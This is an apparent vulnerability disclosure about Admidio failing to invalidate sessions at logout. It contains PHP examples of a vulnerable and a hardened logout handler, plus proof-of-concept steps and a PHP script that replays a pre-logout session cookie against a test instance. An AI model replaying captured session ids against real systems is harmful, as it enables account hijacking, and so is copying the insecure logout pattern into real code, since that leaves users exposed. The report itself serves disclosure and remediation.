Insufficient Session Expiration because of lack of cache check in admidio/admidio
Jul 21st 2023
The web application's session management suffers from an "Insufficient Session Expiration" vulnerability caused by the lack of a proper cache check: when a user logs out, the session that was active before the logout is not invalidated on the server side. A session identifier issued before logout therefore remains valid afterwards, and anyone who holds it (for example from a shared browser, or a session cookie captured earlier) can keep using it to reach sensitive areas and functionality that should require re-authentication.
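How this class of flaw shows up in PHP session handling, as an added example that is not Admidio's code and does not claim to show the affected code path (the report does not name one): a logout handler that only forgets the user for the current request leaves the server-side session record intact, so the old identifier still authenticates when replayed. The hardened handler beside it destroys that record, expires the session cookie and sets no-store caching so a cached authenticated page cannot be re-served either; login regenerates the identifier so a pre-login or logged-out id is never promoted to a valid one. Function names and the `$_SESSION` keys are assumptions for illustration.

```php
<?php
// Added example, not Admidio's code. Function names and $_SESSION keys
// are assumptions chosen for illustration.

// VULNERABLE pattern: forgets the user for this request only. The
// server-side session record for the current id survives, so a client
// that still holds the old cookie is treated as logged in on replay.
function logoutVulnerable(): void
{
    session_start();
    unset($_SESSION['user_id']);              // only this request's copy
    setcookie('logged_in', '', time() - 3600, '/'); // client-side flag only
    header('Location: /index.php');
}

// HARDENED pattern: destroy server-side state, expire the session cookie
// and forbid caching, so neither a replayed id nor a cached page works.
function logoutHardened(): void
{
    session_start();
    $_SESSION = [];                            // drop all data for this id
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [        // expire the cookie client-side
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'] ?? 'Lax',
        ]);
    }
    session_destroy();                         // remove the server-side record
    header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
    header('Pragma: no-cache');
    header('Location: /index.php');
}

// At login, issue a fresh id. The `true` argument deletes the old record,
// so an id captured before authentication (or left over from a logged-out
// session) cannot be upgraded into an authenticated one.
function onLoginSuccess(int $userId): void
{
    session_start();
    session_regenerate_id(true);
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
}

// Every protected page re-checks the server-side record, not a client flag.
// After logoutHardened(), a replayed cookie starts an empty session here
// and is refused; after logoutVulnerable(), the old record still satisfies it.
function requireLogin(): int
{
    session_start();
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        header('Cache-Control: no-store');
        exit('Authentication required');
    }
    return (int) $_SESSION['user_id'];
}
```

The decisive line is `session_destroy()` together with the re-check in `requireLogin()`: clearing a client-side flag or redirecting to the login page is not a logout if the server still honours the old identifier.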
Proof of Concept
Step 1. Log in to the application with a valid user account and note the session identifier (session cookie) that is issued.
Step 2. Access the application's sensitive areas or functionalities with that session.
Step 3. Log out of the application.
Step 4. Log in again.
Step 5. Attempt to access the application using the session identifier captured in Step 1, i.e. the session that was active before logging out.
Step 6. Observe that the old session remains active and accessible, allowing access without requiring re-authentication.
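The steps above automated as a PHP CLI script, added here as an example and not part of the original report or of Admidio: it logs in, records the session id, confirms the id reaches a protected page, logs out, logs in again, then replays the pre-logout id. The base URL, endpoint paths, form field names, credentials, the `PHPSESSID` cookie name and the `Logout` page marker are assumptions that must be adapted to the instance under test; run it only against an instance you are authorised to test.

```php
<?php
// Added example, not part of the report. Everything in the constants
// below is an assumption about the target; adapt before use.
const BASE        = 'http://localhost:8080';
const LOGIN       = BASE . '/login.php';
const LOGOUT      = BASE . '/logout.php';
const PROTECTED   = BASE . '/profile.php';   // any page that requires login
const COOKIE      = 'PHPSESSID';
const AUTH_MARKER = 'Logout';                // text only an authenticated page shows
const USERNAME    = 'testuser';
const PASSWORD    = 'testpass';

// One HTTP request. Returns [status, session id from Set-Cookie or null, body].
function http(string $url, ?string $sid, ?array $post = null): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER         => true,
        CURLOPT_FOLLOWLOCATION => false,     // a 302 to the login form is a signal
    ]);
    if ($sid !== null) {
        curl_setopt($ch, CURLOPT_COOKIE, COOKIE . '=' . $sid);
    }
    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
    }
    $raw = curl_exec($ch);
    if ($raw === false) {
        throw new RuntimeException('curl: ' . curl_error($ch));
    }
    $status  = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $hdrSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    curl_close($ch);
    $headers = substr($raw, 0, $hdrSize);
    $newSid  = null;
    if (preg_match('/^Set-Cookie:\s*' . COOKIE . '=([^;]+)/mi', $headers, $m)) {
        $newSid = $m[1];
    }
    return [$status, $newSid, substr($raw, $hdrSize)];
}

// Protected page is reachable if it answers 200 with authenticated content
// instead of redirecting (302) to the login form or returning 401/403.
function isAuthenticated(int $status, string $body): bool
{
    return $status === 200 && stripos($body, AUTH_MARKER) !== false;
}

// Log in and return the session id the server wants us to use afterwards.
function login(): ?string
{
    [, $preSid] = http(LOGIN, null);           // GET may already set an id
    [, $postSid] = http(LOGIN, $preSid, ['username' => USERNAME, 'password' => PASSWORD]);
    if ($preSid !== null && $postSid === null) {
        echo "note: session id was not regenerated at login (fixation risk)\n";
    }
    return $postSid ?? $preSid;
}

// Step 1: log in and record the session identifier
$oldSid = login();
if ($oldSid === null) {
    exit("no " . COOKIE . " cookie issued; check the login request\n");
}

// Step 2: confirm that this session reaches a protected page
[$status, , $body] = http(PROTECTED, $oldSid);
if (!isAuthenticated($status, $body)) {
    exit("login failed or " . PROTECTED . " is not protected (HTTP $status)\n");
}
echo "logged in: $oldSid reaches " . PROTECTED . "\n";

// Step 3: log out with that session
http(LOGOUT, $oldSid);

// Step 4: log in again (a new session; it must not revive the old id)
login();

// Step 5 and 6: replay the pre-logout id and observe whether it still works
[$status, , $body] = http(PROTECTED, $oldSid);
echo isAuthenticated($status, $body)
    ? "VULNERABLE: old session $oldSid still valid after logout (HTTP $status)\n"
    : "OK: old session rejected after logout (HTTP $status)\n";
```

Checking the body for a marker as well as the status matters because some applications answer a replayed id with HTTP 200 and the login form rather than a redirect; with a status-only check that would be misreported as still authenticated.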
Impact
- Unauthorized Access: An attacker who holds a session identifier can keep using it after the legitimate user has logged out, gaining access to the account, sensitive information, and functionality associated with that session.
- Session Hijacking: Old or captured session IDs can be used to impersonate legitimate users, leading to session hijacking and misuse of the user's privileges.
- Data Exposure: Because old sessions remain active, sensitive user data and application resources are at risk of exposure to unauthorized individuals.
- Identity Theft: The vulnerability lets an attacker perform actions on behalf of a legitimate user after that user believes the session has ended.